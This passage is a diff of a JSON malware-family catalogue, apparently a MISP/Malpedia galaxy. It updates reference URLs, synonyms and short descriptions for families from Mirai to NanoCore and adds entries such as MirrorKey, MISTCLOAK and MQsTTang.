- "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
+ "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
+ "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
+ "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack",
+ "https://twitter.com/PhysicalDrive0/status/830070569202749440",
"https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://twitter.com/PhysicalDrive0/status/830070569202749440"
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
+ "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [],
"type": []
@@ -32252,11 +34017,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast",
- "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies",
"https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant",
"https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924",
- "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/",
- "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/"
+ "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies",
+ "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/",
+ "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/"
],
"synonyms": [],
"type": []
@@ -32264,6 +34029,19 @@
"uuid": "be347289-5ca5-4b49-b5ef-8443883736c1",
"value": "MirrorBlast"
},
+ {
+ "description": "According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey",
+ "https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7340174e-3ff7-4293-acd0-1a82433a7777",
+ "value": "MirrorKey"
+ },
{
"description": "",
"meta": {
@@ -32297,6 +34075,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.misha",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
"https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/"
],
"synonyms": [],
@@ -32310,10 +34089,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu",
+ "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/",
"https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/",
"https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces",
- "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU"
+ "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU",
+ "https://blog.scilabs.mx/cyber-threat-profile-malteiro/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces"
],
"synonyms": [
"URSA"
@@ -32323,6 +34104,20 @@
"uuid": "ffc9ffcc-24f4-4e60-ab02-a75b007359fa",
"value": "Mispadu"
},
+ {
+ "description": "Mandiant associates this with UNC4191, this malware decrypts and runs DARKDEW.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia",
+ "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1e6bc052-73de-453d-ba6c-658c82fe21d4",
+ "value": "MISTCLOAK"
+ },
{
"description": "",
"meta": {
@@ -32373,15 +34168,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "74bd8c09-73d5-4ad8-ab1f-e94a4853c936",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd",
"value": "MM Core"
},
@@ -32411,7 +34197,7 @@
"value": "Mocton"
},
{
- "description": "",
+ "description": "According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.\r\n\r\nLoader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.modern_loader",
@@ -32443,9 +34229,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe",
- "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/",
"https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data",
- "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data"
+ "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data",
+ "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/"
],
"synonyms": [],
"type": []
@@ -32500,10 +34286,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moker",
- "https://breakingmalware.com/malware/moker-part-2-capabilities/",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/",
+ "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network",
"https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/",
- "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network"
+ "https://breakingmalware.com/malware/moker-part-2-capabilities/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/"
],
"synonyms": [],
"type": []
@@ -32530,8 +34316,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mole",
- "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/",
- "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware"
+ "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware",
+ "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/"
],
"synonyms": [],
"type": []
@@ -32557,11 +34343,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "http://www.clearskysec.com/iec/",
"https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
"https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east"
+ "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east",
+ "http://www.clearskysec.com/iec/"
],
"synonyms": [],
"type": []
@@ -32574,9 +34360,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
- "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
+ "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
+ "https://asec.ahnlab.com/en/37526/"
],
"synonyms": [
"CoinMiner"
@@ -32586,6 +34374,19 @@
"uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
"value": "Monero Miner"
},
+ {
+ "description": "A new ransomware gang hitting companies in worldwide firstly spotted by Zscaler.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moneymessage",
+ "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07dff193-2fad-4de6-83ad-046c6b95be46",
+ "value": "Money Message"
+ },
{
"description": "",
"meta": {
@@ -32596,15 +34397,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "aa3aa21f-bc4e-4fb6-acd2-f4b6de482dfe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e0627961-fc28-4b7d-bb44-f937defa052a",
"value": "mongall"
},
@@ -32628,8 +34420,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf",
"https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf",
"https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html",
"https://habr.com/ru/amp/post/668154/"
],
@@ -32649,15 +34441,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "76ec1827-68a1-488f-9899-2b788ea8db64",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
"value": "MoonWind"
},
@@ -32666,12 +34449,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent",
- "https://twitter.com/Timele9527/status/1272776776335233024",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://twitter.com/Timele9527/status/1272776776335233024",
"https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
],
"synonyms": [],
@@ -32705,13 +34488,26 @@
"uuid": "9de41613-7762-4a88-8e9a-4e621a127f32",
"value": "Morphine"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat",
+ "https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff3b11e4-3450-4db5-a2ed-5c45cd875330",
+ "value": "MortalKombat"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.morto",
- "https://www.f-secure.com/weblog/archives/00002227.html",
"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A",
+ "https://www.f-secure.com/weblog/archives/00002227.html",
"http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html"
],
"synonyms": [],
@@ -32751,12 +34547,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
"https://www.recordedfuture.com/turla-apt-infrastructure/",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
- "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/"
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf"
],
"synonyms": [],
"type": []
@@ -32765,34 +34563,42 @@
"value": "Mosquito"
},
{
- "description": "",
+ "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
- "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
- "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/",
- "https://securityscorecard.pathfactory.com/research/quantum-ransomware",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/",
- "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/",
- "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
"https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
- "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates"
+ "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/",
+ "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://securityscorecard.pathfactory.com/research/quantum-ransomware",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
+ "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html"
],
"synonyms": [
+ "DagonLocker",
+ "MountLocker",
"QuantumLocker"
],
"type": []
@@ -32817,8 +34623,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md",
- "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html"
+ "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md"
],
"synonyms": [],
"type": []
@@ -32842,6 +34648,21 @@
"uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
"value": "MPKBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang",
+ "https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/"
+ ],
+ "synonyms": [
+ "QMAGENT"
+ ],
+ "type": []
+ },
+ "uuid": "aed28126-b8ab-4ab5-a2c6-89898fe689c9",
+ "value": "MQsTTang"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -32927,10 +34748,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
"https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -32972,11 +34793,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.malware-traffic-analysis.net/2018/12/19/index.html",
"https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069",
- "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf",
- "https://www.malware-traffic-analysis.net/2018/12/19/index.html"
+ "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503"
],
"synonyms": [
"Mimail",
@@ -32992,12 +34813,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader",
+ "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/",
+ "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf",
"https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
- "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html"
],
"synonyms": [],
"type": []
@@ -33012,9 +34833,10 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot",
"http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
"https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/",
+ "https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet",
"https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html",
- "https://github.com/360netlab/DGA/issues/36",
"https://blog.centurylink.com/mylobot-continues-global-infections/",
+ "https://github.com/360netlab/DGA/issues/36",
"http://www.freebuf.com/column/153424.html"
],
"synonyms": [
@@ -33059,10 +34881,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.n40",
- "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/",
- "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector",
"http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html",
- "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware"
+ "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/",
+ "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware",
+ "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector"
],
"synonyms": [],
"type": []
@@ -33087,11 +34909,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b"
],
"synonyms": [
"Cyruslish",
@@ -33138,55 +34960,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
- "https://community.riskiq.com/article/ade260c6",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://goggleheadedhacker.com/blog/post/11",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/",
- "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
- "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://goggleheadedhacker.com/blog/post/11",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
